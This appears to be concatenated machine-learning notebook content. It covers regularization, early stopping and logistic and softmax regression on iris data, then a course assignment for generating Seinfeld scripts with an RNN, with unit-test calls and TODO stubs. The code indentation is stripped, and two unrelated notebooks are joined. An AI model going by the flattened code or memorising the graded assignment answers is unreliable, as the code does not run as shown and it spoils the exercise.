ax.contourf(t1, t2, JR, levels=levelsJR, alpha=0.9)
ax.plot(path_JR[:, 0], path_JR[:, 1], "w-o")
ax.plot(path_N[:, 0], path_N[:, 1], "y--")
ax.plot(0, 0, "ys")
ax.plot(t1_min, t2_min, "ys")
ax.plot(t1r_min, t2r_min, "rs")
ax.set_title(title, fontsize=16)
ax.axis([t1a, t1b, t2a, t2b])
if i == 1:
ax.set_xlabel(r"$\theta_1$", fontsize=16)
plt.show()
```
# Elastic Net
```
from sklearn.linear_model import ElasticNet
elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)
elastic_net.fit(X, y)
elastic_net.predict([[1.5]])
```
# Early Stopping
```
np.random.seed(42)
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 2 + X + 0.5 * X**2 + np.random.randn(m, 1)
X_train, X_val, y_train, y_val = train_test_split(X[:50], y[:50].ravel(), test_size=0.5, random_state=10)
```
## Early Stopping - Example Code:
```
from copy import deepcopy
poly_scaler = Pipeline([
("poly_features", PolynomialFeatures(degree=90, include_bias=False)),
("std_scaler", StandardScaler())
])
X_train_poly_scaled = poly_scaler.fit_transform(X_train)
X_val_poly_scaled = poly_scaler.transform(X_val)
sgd_reg = SGDRegressor(max_iter=1, tol=-np.inf, warm_start=True,
penalty=None, learning_rate="constant", eta0=0.0005, random_state=42)
minimum_val_error = float("inf")
best_epoch = None
best_model = None
for epoch in range(1000):
sgd_reg.fit(X_train_poly_scaled, y_train) # continues where it left off
y_val_predict = sgd_reg.predict(X_val_poly_scaled)
val_error = mean_squared_error(y_val, y_val_predict)
if val_error < minimum_val_error:
minimum_val_error = val_error
best_epoch = epoch
best_model = deepcopy(sgd_reg)
```
## Early Stopping - Graph:
```
sgd_reg = SGDRegressor(max_iter=1, tol=-np.inf, warm_start=True,
penalty=None, learning_rate="constant", eta0=0.0005, random_state=42)
n_epochs = 500
train_errors, val_errors = [], []
for epoch in range(n_epochs):
sgd_reg.fit(X_train_poly_scaled, y_train)
y_train_predict = sgd_reg.predict(X_train_poly_scaled)
y_val_predict = sgd_reg.predict(X_val_poly_scaled)
train_errors.append(mean_squared_error(y_train, y_train_predict))
val_errors.append(mean_squared_error(y_val, y_val_predict))
best_epoch = np.argmin(val_errors)
best_val_rmse = np.sqrt(val_errors[best_epoch])
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
plt.annotate('Best model',
xy=(best_epoch, best_val_rmse),
xytext=(best_epoch, best_val_rmse + 1),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.05),
fontsize=16,
)
best_val_rmse -= 0.03 # just to make the graph look better
plt.plot([0, n_epochs], [best_val_rmse, best_val_rmse], "k:", linewidth=2)
plt.plot(np.sqrt(val_errors), "b-", linewidth=3, label="Validation set")
plt.plot(np.sqrt(train_errors), "r--", linewidth=2, label="Training set")
plt.legend(loc="upper right", fontsize=14)
plt.xlabel("Epoch", fontsize=14)
plt.ylabel("RMSE", fontsize=14)
plt.show()
```
# Logistic Regression
```
t = np.linspace(-10, 10, 100)
sig = 1 / (1 + np.exp(-t))
fig, axs = plt.subplots(figsize=(15, 7))
fig.set_facecolor('white')
plt.plot([-10, 10], [0, 0], "k-")
plt.plot([-10, 10], [0.5, 0.5], "k:")
plt.plot([-10, 10], [1, 1], "k:")
plt.plot([0, 0], [-1.1, 1.1], "k-")
plt.plot(t, sig, "b-", linewidth=2, label=r"$\sigma(t) = \frac{1}{1 + e^{-t}}$")
plt.xlabel("t")
plt.legend(loc="upper left", fontsize=20)
plt.axis([-10, 10, -0.1, 1.1])
plt.show()
from sklearn import datasets
iris = datasets.load_iris()
list(iris.keys())
X = iris["data"][:, 3:] # petal width
y = (iris["target"] == 2).astype(int) # 1 if Iris virginica, else 0
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression()
log_reg.fit(X, y)
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
fig, axs = plt.subplots(figsize=(10, 5))
fig.set_facecolor('white')
plt.plot(X_new, y_proba[:, 1], "g-", label="Iris virginica")
plt.plot(X_new, y_proba[:, 0], "b--", label="Not Iris virginica")
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0);
fig, axs = plt.subplots(figsize=(15, 7))
fig.set_facecolor('white')
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
decision_boundary = X_new[y_proba[:, 1] >= 0.5][0]
plt.plot(X[y==0], y[y==0], "bs")
plt.plot(X[y==1], y[y==1], "g^")
plt.plot([decision_boundary, decision_boundary], [-1, 2], "k:", linewidth=2)
plt.plot(X_new, y_proba[:, 1], "g-", linewidth=2, label="Iris virginica")
plt.plot(X_new, y_proba[:, 0], "b--", linewidth=2, label="Not Iris virginica")
plt.text(decision_boundary+0.02, 0.15, "Decision boundary", fontsize=14, color="k", ha="center")
plt.arrow(decision_boundary, 0.08, -0.3, 0, head_width=0.05, head_length=0.1, fc='b', ec='b')
plt.arrow(decision_boundary, 0.92, 0.3, 0, head_width=0.05, head_length=0.1, fc='g', ec='g')
plt.xlabel("Petal width (cm)", fontsize=14)
plt.ylabel("Probability", fontsize=14)
plt.legend(loc="center left", fontsize=14)
plt.axis([0, 3, -0.02, 1.02])
plt.show()
log_reg.predict([[1.7], [1.5]])
```
# Softmax Regression
```
X = iris["data"][:, (2, 3)]
y = iris["target"]
softmax_reg = LogisticRegression(multi_class="multinomial", solver="lbfgs", C=10)
softmax_reg.fit(X, y)
softmax_reg.predict([[5, 2]])
softmax_reg.predict_proba([[5, 2]])
```
## Softmax Regression (Without scikit-learn):
```
import pandas as pd
iris_data = iris["data"]
iris_target = iris["target"]
iris_data[:5]
iris_target[:5]
np.unique(iris_target)
iris["target_names"]
```
### Adding bias to the data:
Every instance carries a constant bias feature, i.e. $x^{(i)}_0 = 1$, where $x^{(i)}_0$ denotes the $0^{th}$ feature of the $i^{th}$ instance of $x$.
```
iris_data_with_bias = np.c_[np.ones((iris_data.shape[0], 1)), iris_data]
iris_data_with_bias[:5]
```
### Splitting the dataset into train and test without using Scikit-learn (train_test_split)
We will follow the general practice of splitting the dataset into 80% train and 20% test.
```
def train_test_split(X, y, test_ratio=0.2):
total_size = len(X)
random_indices = np.random.permutation(total_size)
train_size = int(total_size*(1 - test_ratio))
train = X[random_indices[:train_size]]
train_result = y[random_indices[:train_size]]
test = X[random_indices[train_size:]]
test_result = y[random_indices[train_size:]]
return train, train_result, test, test_result
iris_train, iris_train_result, iris_test, iris_test_result = train_test_split(iris_data_with_bias,
iris_target,
test_ratio=0.2)
print('training:', iris_train.shape,'training_result:', iris_train_result.shape )
print('train set:\n',iris_train[:5])
print('train result set:\n', iris_train_result[:5])
print('test:', iris_test.shape,'test_result:', iris_test_result.shape )
print('test set:\n',iris_test[:5])
print('test result set:\n', iris_test_result[:5])
```
### One-hot Encoding the train target set:
```
def one_hot_encoder(target):
encoded_target = np.zeros(shape=(target.size, np.unique(target).size))
encoded_target[np.arange(target.size), target] = 1
return encoded_target
encoded_target = one_hot_encoder(iris_train_result)
np.unique(encoded_target, axis=0)
```
### Functions for the Softmax scores and probabilities of the training set:
```
def softmax_scores_func(data, theta):
return data.dot(theta)
def softmax_probability_func(softmax_scores):
return np.exp(softmax_scores)/np.sum(np.exp(softmax_scores), axis=1, keepdims=True)
```
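One caveat worth noting: `softmax_probability_func` exponentiates raw scores, which can overflow for large values. A numerically stable variant (a sketch, not part of the original tutorial) subtracts the row-wise maximum before exponentiating, which leaves the resulting probabilities unchanged:

```python
import numpy as np

def stable_softmax(scores):
    # Subtracting the per-row maximum does not change the softmax output,
    # but it keeps np.exp from overflowing on large scores.
    shifted = scores - np.max(scores, axis=1, keepdims=True)
    exp_scores = np.exp(shifted)
    return exp_scores / np.sum(exp_scores, axis=1, keepdims=True)
```

With the naive formula, a score of 1000 produces `inf / inf = nan`; the shifted version stays finite.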
### Finding the Optimum $\vec{\theta}_k$, where $k \in \{0, \ldots, K-1\}$ and $K$ is the number of classes:
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
for validation in range(n_validations):
X_train, y_train, X_valid, y_valid = train_test_split(X, y, test_ratio=validation_ratio)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
if iteration % 500 == 0:
print(iteration,' ', f'{loss:.5f}')
gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
softmax_theta = softmax_theta - alpha * gradient
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.1, validation_ratio=0.4, n_validations=5)
print(softmax_theta)
print(validation_accuracy)
print(validation)
def predict(X, theta):
predictions = X.dot(theta)
return np.argmax(predictions, axis=1)
final_predictions = predict(iris_test, softmax_theta)
final_predictions[:5]
final_accuracy = np.sum(final_predictions == iris_test_result)/len(iris_test_result)
final_accuracy
```
### Adding Regularization to the `optimum_theta` Function
We will add an $l_2$ penalty to the loss; hopefully it helps us achieve a better result!
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, loss=True, reg_para=0.1, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
# Handles all the loss parameters
loss_flag = int(loss)
for validation in range(n_validations):
X_train, y_train, X_valid, y_valid = train_test_split(X, y, test_ratio=validation_ratio)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
# Since, the total loss is a summation of two terms, we can separate them
entropy_loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
l2_loss = (loss_flag)*((1/2) * np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
if iteration % 500 == 0:
print(iteration,' ', f'{total_loss:.5f}')
# Since, the total gradient is a summation of two terms, we can separate them
entropy_gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
l2_gradient = (loss_flag) * (np.r_[np.zeros([1, n_classes]), reg_para * softmax_theta[1:]])
softmax_theta = softmax_theta - alpha * (entropy_gradient + l2_gradient)
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.1, validation_ratio=0.1, n_validations=5, loss=True)
print(softmax_theta)
print(validation_accuracy)
print(validation)
regularized_predictions = predict(iris_test, softmax_theta)
regularized_predictions[:5]
regularized_accuracy = np.mean(regularized_predictions == iris_test_result)
regularized_accuracy
```
The accuracy went down instead of going up, but we know why.<br><br>
If you look at the loss values of each validation, you will see that after some iterations the loss values start to increase. This is because the model starts to overfit the data, and as a result our final accuracy goes down.<br><br>
*To solve this we will use the ***EARLY-STOPPING*** method.*
### Adding Early Stopping to the Regularized `optimum_theta` Function
```
def optimum_theta(X, y, n_iterations, alpha, validation_ratio, n_validations, loss=True, reg_para=0.1, epsilon=1e-7):
best_accuracy = 0
best_theta = np.zeros(shape=(X.shape[1], np.unique(y).size))
best_validation = -1
# Handles all the loss parameters
loss_flag = int(loss)
for validation in range(n_validations):
best_loss = np.inf
X_train, y_train, X_valid, y_valid = train_test_split(X, y, test_ratio=validation_ratio)
n_classes = np.unique(y_train).size
softmax_theta = np.random.randn(X_train.shape[1], n_classes)
m = y_train.size
y_one_hot = one_hot_encoder(y_train)
y_valid_one_hot = one_hot_encoder(y_valid)
print('Validation : ', validation)
for iteration in range(n_iterations):
softmax_scores = softmax_scores_func(X_train, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
# Since, the total loss is a summation of two terms, we can separate them
entropy_loss = -np.mean(np.sum(y_one_hot * np.log(softmax_proba + epsilon), axis=1))
l2_loss = (loss_flag)*((1/2) * np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
# Since, the total gradient is a summation of two terms, we can separate them
entropy_gradient = (1/m)*(X_train.T.dot(softmax_proba - y_one_hot))
l2_gradient = (loss_flag) * (np.r_[np.zeros([1, n_classes]), reg_para * softmax_theta[1:]])
softmax_theta = softmax_theta - alpha * (entropy_gradient + l2_gradient)
# Early-Stop condition
softmax_scores = softmax_scores_func(X_valid, softmax_theta)
softmax_proba = softmax_probability_func(softmax_scores)
entropy_loss = -(np.mean(np.sum(y_valid_one_hot * np.log(softmax_proba + epsilon), axis=1)))
l2_loss = (loss_flag)*((1/2)*np.sum(np.square(softmax_theta[1:])))
total_loss = entropy_loss + reg_para * l2_loss
if iteration % 500 == 0:
print(f'{iteration} -> {total_loss:.5f}')
if total_loss < best_loss:
best_loss = total_loss
else:
print(f'{iteration - 1} -> {best_loss:.5f} Best Loss!')
print(f'{iteration} -> {total_loss:.5f} Early Stopping!')
break
y_predict = np.argmax(X_valid.dot(softmax_theta), axis=1)
accuracy = np.sum(y_predict == y_valid)/len(y_valid)
print(f'ACCURACY: {accuracy:.5f}\n')
if(accuracy > best_accuracy):
best_accuracy = accuracy
best_theta = softmax_theta
best_validation = validation
return best_theta, best_accuracy, best_validation
softmax_theta, validation_accuracy, validation = optimum_theta(iris_train, iris_train_result, n_iterations=5001, alpha=0.07, validation_ratio=0.2, n_validations=5, loss=False, reg_para=0.1)
print(softmax_theta)
print(validation_accuracy)
print(validation)
early_stopping_predictions = predict(iris_test, softmax_theta)
early_stopping_predictions[:5]
early_stopping_accuracy = np.mean(early_stopping_predictions == iris_test_result)
early_stopping_accuracy
```
# TV Script Generation
In this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new, "fake" TV script based on patterns it recognizes in this training data.
## Get the Data
The data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text.
>* As a first step, we'll load in this data and look at some samples.
* Then, you'll be tasked with defining and training an RNN to generate a new script!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# load in data
import helper
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
```
## Explore the Data
Play around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\n`.
```
view_line_range = (0, 10)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import numpy as np
print('Dataset Stats')
print('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))
lines = text.split('\n')
print('Number of lines: {}'.format(len(lines)))
word_count_line = [len(line.split()) for line in lines]
print('Average number of words in each line: {}'.format(np.average(word_count_line)))
print()
print('The lines {} to {}:'.format(*view_line_range))
print('\n'.join(text.split('\n')[view_line_range[0]:view_line_range[1]]))
```
---
## Implement Pre-processing Functions
The first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:
- Lookup Table
- Tokenize Punctuation
### Lookup Table
To create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:
- Dictionary to go from the words to an id, we'll call `vocab_to_int`
- Dictionary to go from the id to word, we'll call `int_to_vocab`
Return these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`
```
import problem_unittests as tests
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
# TODO: Implement Function
int_to_vocab = dict(enumerate(list(set(text)))) # Remove duplicates before enumerating
vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
return (vocab_to_int, int_to_vocab)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_create_lookup_tables(create_lookup_tables)
```
### Tokenize Punctuation
We'll be splitting the script into a word array using spaces as delimiters. However, punctuation like periods and exclamation marks can create multiple ids for the same word. For example, "bye" and "bye!" would generate two different word ids.
Implement the function `token_lookup` to return a dict that will be used to tokenize symbols like "!" into "||Exclamation_Mark||". Create a dictionary for the following symbols where the symbol is the key and value is the token:
- Period ( **.** )
- Comma ( **,** )
- Quotation Mark ( **"** )
- Semicolon ( **;** )
- Exclamation mark ( **!** )
- Question mark ( **?** )
- Left Parentheses ( **(** )
- Right Parentheses ( **)** )
- Dash ( **-** )
- Return ( **\n** )
This dictionary will be used to tokenize the symbols and add the delimiter (space) around them. This separates each symbol into its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused as a word; for example, instead of using the value "dash", try using something like "||dash||".
```
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
# TODO: Implement Function
return {
".": "__Period__",
",": "__Comma__",
"\"": "__QuotationMark__",
";": "__Semicolon__",
"!": "__ExclamationMark__",
"?": "__QuestionMark__",
"(": "__LeftParentheses__",
")": "__RightParentheses__",
"-": "__Dash__",
"\n": "__Return__"
}
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_tokenize(token_lookup)
```
## Pre-process all the data and save it
Running the code cell below will pre-process all the data and save it to file. You're encouraged to look at the code for `preprocess_and_save_data` in the `helpers.py` file to see what it's doing in detail, but you do not need to change this code.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# pre-process training data
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
```
# Check Point
This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import helper
import problem_unittests as tests
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
```
## Build the Neural Network
In this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.
### Check Access to GPU
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
```
## Input
Let's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.
You can create data with TensorDataset by passing in feature and target tensors. Then create a DataLoader as usual.
```
data = TensorDataset(feature_tensors, target_tensors)
data_loader = torch.utils.data.DataLoader(data,
batch_size=batch_size)
```
### Batching
Implement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.
>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.
For example, say we have these as input:
```
words = [1, 2, 3, 4, 5, 6, 7]
sequence_length = 4
```
Your first `feature_tensor` should contain the values:
```
[1, 2, 3, 4]
```
And the corresponding `target_tensor` should just be the next "word"/tokenized word value:
```
5
```
This should continue with the second `feature_tensor`, `target_tensor` being:
```
[2, 3, 4, 5] # features
6 # target
```
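The windowing described above can be sketched directly in NumPy (`make_windows` is an illustrative helper name, separate from the graded `batch_data` function):

```python
import numpy as np

def make_windows(words, sequence_length):
    # Each feature row is a window of `sequence_length` consecutive words;
    # each target is the single word that immediately follows its window.
    words = np.asarray(words)
    features = np.array([words[i:i + sequence_length]
                         for i in range(len(words) - sequence_length)])
    targets = words[sequence_length:]
    return features, targets

features, targets = make_windows([1, 2, 3, 4, 5, 6, 7], sequence_length=4)
# features[0] -> [1, 2, 3, 4], targets[0] -> 5
```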
```
from torch.utils.data import TensorDataset, DataLoader
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
# Build sliding windows: each feature row holds `sequence_length` consecutive
# word ids, and its target is the word id that immediately follows the window.
words = np.asarray(words)
n_samples = len(words) - sequence_length
features = np.array([words[i:i + sequence_length] for i in range(n_samples)])
feature_tensors = torch.tensor(features)
target_tensors = torch.tensor(words[sequence_length:])
data = TensorDataset(feature_tensors, target_tensors)
data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)
return data_loader
# there is no test for this function, but you are encouraged to create
# print statements and tests of your own
```
### Test your dataloader
You'll have to modify this code to test a batching function, but it should look fairly similar.
Below, we're generating some test text data and defining a dataloader using the function you defined, above. Then, we are getting some sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.
Your code should return something like the following (likely in a different order, if you shuffled your data):
```
torch.Size([10, 5])
tensor([[ 28, 29, 30, 31, 32],
[ 21, 22, 23, 24, 25],
[ 17, 18, 19, 20, 21],
[ 34, 35, 36, 37, 38],
[ 11, 12, 13, 14, 15],
[ 23, 24, 25, 26, 27],
[ 6, 7, 8, 9, 10],
[ 38, 39, 40, 41, 42],
[ 25, 26, 27, 28, 29],
[ 7, 8, 9, 10, 11]])
torch.Size([10])
tensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])
```
### Sizes
Your sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10).
### Values
You should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.
```
# test dataloader
test_text = range(50)
t_loader = batch_data(test_text, sequence_length=5, batch_size=10)
data_iter = iter(t_loader)
sample_x, sample_y = next(data_iter)
print(sample_x.shape)
print(sample_x)
print()
print(sample_y.shape)
print(sample_y)
words = [11, 12, 13, 14, 15, 16, 17, 18]
sequence_length = 2
t_loader = batch_data(words, sequence_length, 4)
data_iter = iter(t_loader)
sample_x, sample_y = next(data_iter)
print()
print('sample_x.shape:', sample_x.shape)
print('sample_x:', sample_x)
print()
print('sample_y.shape', sample_y.shape)
print('sample_y:', sample_y)
```
---
## Build the Neural Network
Implement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:
- `__init__` - The initialize function.
- `init_hidden` - The initialization function for an LSTM/GRU hidden state
- `forward` - Forward propagation function.
The initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.
**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.
### Hints
1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer, you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`
2. You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:
```
# reshape into (batch_size, seq_length, output_size)
output = output.view(batch_size, -1, self.output_size)
# get last batch
out = output[:, -1]
```
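For orientation only, here is one minimal way to satisfy that interface: an embedding feeding an LSTM feeding a fully-connected layer. The class name `SketchRNN` and every dimension choice below are illustrative assumptions, not the graded solution:

```python
import torch
import torch.nn as nn

class SketchRNN(nn.Module):
    # Illustrative sketch: embedding -> LSTM -> fully-connected,
    # returning only the word scores for the last time step of each sequence.
    def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
        super().__init__()
        self.hidden_dim = hidden_dim
        self.n_layers = n_layers
        self.output_size = output_size
        self.embedding = nn.Embedding(vocab_size, embedding_dim)
        self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers,
                            dropout=dropout, batch_first=True)
        self.fc = nn.Linear(hidden_dim, output_size)

    def forward(self, nn_input, hidden):
        batch_size = nn_input.size(0)
        embeds = self.embedding(nn_input)
        lstm_out, hidden = self.lstm(embeds, hidden)
        # stack LSTM outputs, score every time step, then keep the last one
        out = self.fc(lstm_out.contiguous().view(-1, self.hidden_dim))
        out = out.view(batch_size, -1, self.output_size)
        return out[:, -1], hidden

    def init_hidden(self, batch_size):
        # zero-initialized (h, c) pair on the same device/dtype as the weights
        weight = next(self.parameters()).data
        h = weight.new_zeros(self.n_layers, batch_size, self.hidden_dim)
        c = weight.new_zeros(self.n_layers, batch_size, self.hidden_dim)
        return (h, c)
```

Note how the reshape in `forward` mirrors the two hints above.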
```
import torch.nn as nn
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# TODO: Implement function
# set class variables
# define model layers
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
# TODO: Implement function
# return one batch of output word scores and the hidden state
return None, None
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
# initialize hidden state with zero weights, and move to GPU if available
return None
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_rnn(RNN, train_on_gpu)
```
### Define forward and backpropagation
Use the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:
```
loss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)
```
And it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.
**If a GPU is available, you should move your data to that GPU device, here.**
```
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param rnn: The PyTorch Module that holds the neural network
:param optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# TODO: Implement Function
# move data to GPU, if available
# perform backpropagation and optimization
# return the loss over a batch and the hidden state produced by our model
return None, None
# Note that these tests aren't completely extensive.
# they are here to act as general checks on the expected outputs of your functions
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)
```
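A hedged sketch of what such a function can look like (GPU transfers are omitted for brevity; the name `sketch_forward_back_prop` and the gradient-clipping threshold are illustrative choices, not the notebook's required solution):

```python
import torch
import torch.nn as nn

def sketch_forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
    # Detach the hidden state so gradients do not propagate across batches.
    hidden = tuple(h.detach() for h in hidden)  # assumes an LSTM (h, c) tuple
    optimizer.zero_grad()
    output, hidden = rnn(inp, hidden)
    loss = criterion(output, target)
    loss.backward()
    # Clipping is a common guard against exploding gradients, not a requirement.
    nn.utils.clip_grad_norm_(rnn.parameters(), 5)
    optimizer.step()
    return loss.item(), hidden
```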
## Neural Network Training
With the structure of the network complete and data ready to be fed in the neural network, it's time to train it.
### Train Loop
The training loop is implemented for you in the `train_rnn` function. This function will train the network over all the batches for the number of epochs given. Model progress is printed every `show_every_n_batches` batches; you'll set this parameter along with the others in the next section.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
```
### Hyperparameters
Set and train the neural network with the following parameters:
- Set `sequence_length` to the length of a sequence.
- Set `batch_size` to the batch size.
- Set `num_epochs` to the number of epochs to train for.
- Set `learning_rate` to the learning rate for an Adam optimizer.
- Set `vocab_size` to the number of unique tokens in our vocabulary.
- Set `output_size` to the desired size of the output.
- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.
- Set `hidden_dim` to the hidden dimension of your RNN.
